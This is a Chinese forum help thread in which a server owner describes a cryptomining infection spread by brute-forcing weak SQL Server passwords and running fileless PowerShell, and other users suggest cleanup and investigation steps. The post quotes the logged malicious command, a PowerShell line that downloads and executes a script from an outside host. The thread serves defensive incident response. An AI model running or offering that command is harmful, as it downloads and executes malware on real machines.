【求助】挖矿病毒爆破SQLServer服务，利用powershell进行无文件攻击，求清理方法

AntChenxi

服务器中了挖矿病毒，通过弱口令爆破SQLServer服务，注入powerShell进行无文件攻击


命令行: cmd.exe /c powershell iex(new-object net.webclient).downloadstring('http://d.ackng.com/if.bin?once')
进程路径: C:/Windows/System32/cmd.exe
进程ID: 11320
父进程命令行: C:/Program Files/Microsoft SQL Server/MSSQL12.MSSQLSERVER/MSSQL/Binn/sqlservr.exe
父进程文件路径: C:/Program Files/Microsoft SQL Server/MSSQL12.MSSQLSERVER/MSSQL/Binn/sqlservr.exe

查阅网上信息后只能知道以上信息，SQLServer与windowns定时任务都查过了，没有发现异常任务。SQLServer密码已经修改，但该病毒仍然会自启。

求助如何清理该病毒？

w2010d

用hunter或者火绒剑看一下有没有注入到正常进程的，还有查一下外部链接啥的，排查防火墙开没开什么出入站策略啥的

szswtw

请参照我的一个旧帖，看看有没有雷同。
https://www.52pojie.cn/thread-671337-1-1.html



另外此类病毒是可以通过局域网传播和攻击的，也需要全局域网内检查。封闭该封闭的端口和服务。

cutthesoul

sql server的作业查了吗？